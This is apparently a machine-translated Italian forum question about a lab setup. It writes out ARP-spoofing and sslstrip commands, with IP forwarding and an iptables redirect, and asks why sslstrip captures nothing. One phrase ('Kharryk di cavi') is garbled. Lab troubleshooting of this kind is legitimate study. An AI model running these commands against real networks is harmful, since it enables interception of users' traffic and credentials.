Ho una LAN con 3 macchine collegate a uno switch. Due macchine eseguono Ubuntu 15.04, una con Apache SSL installato che funziona come server web. Un'altra macchina che esegue Ubuntu funge da client. La macchina dell'attaccante esegue Kali 2.0.
Tutte le macchine hanno gli indirizzi IP assegnati manualmente:
Client: 192.168.1.1 HW: 08:00:27:2a:ec:cc
Server: 192.168.1.2 HW: 00:11:22:33:44:55
Kali: 192.168.1.3 HW: 08:00:27:fa:25:8e
Ho eseguito i seguenti comandi su Kali:
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
E poi eseguo sslstrip -k -l 8080 .
Ora avvio arpspoof :
arpspoof -i eth0 -t 192.168.1.1 192.168.1.2
arpspoof -i eth0 -t 192.168.1.2 192.168.1.1
Le tabelle arp sul client e sul server sono state entrambe falsificate e contengono l'HW della macchina Kali.
Ho anche Kharryk di cavi in esecuzione.
Quando ora accedi al sito web dal server con il cliente con https://192.168.1.2/test.html viene visualizzato il sito web.
Posso vedere tutti i pacchetti per l'handshake SSL / TLS anche su wireshark.
Ma sslstrip non mostra nulla!?